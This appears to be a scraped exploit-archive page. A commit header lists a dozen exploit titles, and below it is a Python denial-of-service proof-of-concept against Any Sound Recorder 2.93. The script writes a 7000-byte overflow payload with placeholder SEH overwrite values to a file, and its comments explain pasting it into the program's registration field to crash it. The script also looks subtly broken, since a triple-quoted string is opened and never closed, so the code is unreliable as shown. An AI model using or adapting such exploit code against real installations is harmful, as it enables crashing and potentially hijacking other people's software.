87053f010c
12 changes to exploits/shellcodes SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH) Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH) Photo To Video Converter Professional 8.07 - Buffer Overflow (SEH) Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH) Any Sound Recorder 2.93 - Denial of Service (PoC) Zenmap (Nmap) 7.70 - Denial of Service (PoC) Ghostscript - Failed Restore Command Execution (Metasploit) VirtualBox 5.2.6.r120293 - VM Escape Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit) RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities RPi Cam Control < 6.3.14 - Multiple Vulnerabilities LW-N605R 12.20.2.1486 - Remote Code Execution RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution
33 lines
No EOL
1 KiB
Python
Executable file
33 lines
No EOL
1 KiB
Python
Executable file
# Exploit Title: Any Sound Recorder 2.93 - Denial of Service (PoC)
|
|
# Date: 2018-09-09
|
|
# Exploit Author: T3jv1l
|
|
# Vendor Homepage: http://www.any-sound-recorder.com
|
|
# Software: http://www.any-sound-recorder.com/anysoundrecorder.exe
|
|
# Version: Any Sound Recorder 2.93
|
|
# Tested on: Windows 7 SP1 x86
|
|
|
|
#!/usr/bin/python
|
|
|
|
import struct
|
|
print"""
|
|
|
|
#1. Download and install the setup file
|
|
#2. A file "Byte.txt" will be created
|
|
#3. Click Help > Enter key code... in tool bar
|
|
#4. Copy the contents of the file (Byte.txt) and paste in the Username Name field
|
|
#5. Click Register and BOOMMMM !!!!
|
|
|
|
totalsize = 7000 # total size buff
|
|
buffer= "\x41" * 900 #Offset
|
|
nseh= "BBBB" # next seh address
|
|
seh= "CCCC" # seh address
|
|
shellcode= "T" * (totalsize-len(buffer+nseh+seh))
|
|
payload = buffer + nseh + seh + shellcode
|
|
try:
|
|
f=open("Byte.txt","w")
|
|
print "[+] Creating %s bytes payload..." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |